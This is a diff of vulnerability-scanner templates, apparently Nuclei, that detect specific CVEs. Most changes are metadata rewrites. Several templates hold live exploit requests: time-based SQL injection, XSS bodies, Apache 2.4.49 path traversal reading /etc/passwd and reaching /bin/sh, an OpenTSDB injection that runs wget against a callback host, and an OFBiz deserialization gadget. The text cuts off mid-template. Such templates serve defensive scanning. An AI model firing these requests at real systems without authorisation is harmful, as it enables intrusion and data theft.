Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2020-24903
|
||||
|
||||
info:
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross Site Scripting
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://seclists.org/bugtraq/2016/Mar/104
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||||
|
@ -17,7 +17,7 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.component:"ASP.NET"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,cuteeditor,xss,seclists
|
||||
tags: cve,cve2020,cuteeditor,xss,seclists
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
|
||||
name: PrestaShop Product Comments <4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
|
||||
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
remediation: Fixed in 4.2.1.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -4,38 +4,43 @@ info:
|
|||
name: OpenTSDB <= 2.4.0 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
|
||||
description: |
|
||||
OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
|
||||
reference:
|
||||
- https://github.com/OpenTSDB/opentsdb/issues/2051
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
|
||||
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-35476
|
||||
cwe-id: CWE-78
|
||||
tags: cve,cve2020,opentsdb,rce
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"OpenTSDB"
|
||||
tags: cve,cve2020,opentsdb,rce,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
||||
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- plotted
|
||||
- timing
|
||||
- cachehit
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/04/28
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2021-20323
|
||||
|
||||
info:
|
||||
name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting
|
||||
author: ndmalc
|
||||
severity: medium
|
||||
description: |
|
||||
Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.
|
||||
reference:
|
||||
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
|
||||
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
|
||||
- https://access.redhat.com/security/cve/CVE-2021-20323
|
||||
- https://github.com/ndmalc/CVE-2021-20323
|
||||
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-20323
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: html:"Keycloak"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,keycloak,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,4 +1,4 @@
|
|||
id: unpatched-coldfusion
|
||||
id: CVE-2021-21087
|
||||
|
||||
info:
|
||||
name: Adobe ColdFusion - Remote Code Execution
|
|
@ -1,18 +1,15 @@
|
|||
id: CVE-2021-24227
|
||||
|
||||
info:
|
||||
name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure
|
||||
name: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: The Jetpack Scan team identified a Local File Disclosure vulnerability
|
||||
in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting
|
||||
the site. Using this attack vector, an attacker could leak important internal
|
||||
files like wp-config.php, which contains database credentials and cryptographic
|
||||
keys used in the generation of nonces and cookies.
|
||||
description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
|
||||
- https://wordpress.org/plugins/patreon-connect/
|
||||
- https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24227
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -34,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-24827
|
||||
|
||||
info:
|
||||
name: WordPress Asgaros Forum <1.15.13 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
|
||||
- https://wordpress.org/plugins/asgaros-forum/
|
||||
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24827
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "asgarosforum")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-24946
|
||||
|
||||
info:
|
||||
name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
|
||||
- https://wordpress.org/plugins/modern-events-calendar-lite/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24946
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200 || status_code == 500'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-25099
|
||||
|
||||
info:
|
||||
name: WordPress GiveWP <2.17.3 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
|
||||
- https://wordpress.org/plugins/give/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-25099
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body, "give_user_login")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -39,21 +39,17 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- "application/x-www-form-urlencoded"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/15
|
||||
|
|
|
@ -0,0 +1,58 @@
|
|||
id: CVE-2021-30128
|
||||
|
||||
info:
|
||||
name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
|
||||
author: For3stCo1d
|
||||
severity: critical
|
||||
description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
|
||||
reference:
|
||||
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
|
||||
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
|
||||
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-30128
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
fofa-query: app="Apache_OFBiz"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,apache,ofbiz,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webtools/control/SOAPService HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<ser>
|
||||
<map-Map>
|
||||
<map-Entry>
|
||||
<map-Key>
|
||||
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
|
||||
</map-Key>
|
||||
<map-Value>
|
||||
<std-String/>
|
||||
</map-Value>
|
||||
</map-Entry>
|
||||
</map-Map>
|
||||
</ser>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="errorMessage"'
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 SQL Injection
|
||||
name: PrestaShop 1.7.7.0 - SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
|
||||
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-35380
|
||||
|
||||
info:
|
||||
name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
|
||||
name: TermTalk Server 3.24.0.2 - Local File Inclusion
|
||||
author: fxploit
|
||||
severity: high
|
||||
description: |
|
||||
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
|
||||
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
|
||||
reference:
|
||||
- https://www.swascan.com/solari-di-udine/
|
||||
- https://www.exploit-db.com/exploits/50638
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-35380
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
|
||||
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2021-40661
|
||||
|
||||
info:
|
||||
name: IND780 - Directory Traversal
|
||||
name: IND780 - Local File Inclusion
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
|
||||
IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
|
||||
reference:
|
||||
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
|
||||
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40661
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -38,3 +39,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo,666asd
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
description: |
|
||||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
|
@ -12,14 +13,13 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
remediation: Update to Apache HTTP Server 2.4.50 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: apache version:2.4.49
|
||||
shodan-query: Apache 2.4.49
|
||||
verified: "true"
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
|
||||
|
||||
|
@ -32,6 +32,10 @@ requests:
|
|||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -42,7 +46,6 @@ requests:
|
|||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
name: LFI
|
||||
regex:
|
||||
|
|
|
@ -29,7 +29,7 @@ requests:
|
|||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â{{VSÂ}}")}}&__VIEWSTATEGENERATOR={{url_encode("Â{{VSGÂ}}")}}&__EVENTVALIDATION={{url_encode("Â{{EVÂ}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-42887
|
||||
|
||||
info:
|
||||
name: TOTOLINK - Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2021-42887
|
||||
- https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-42887
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: title:"TOTOLINK"
|
||||
tags: totolink,auth-bypass,cve,cve2021,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
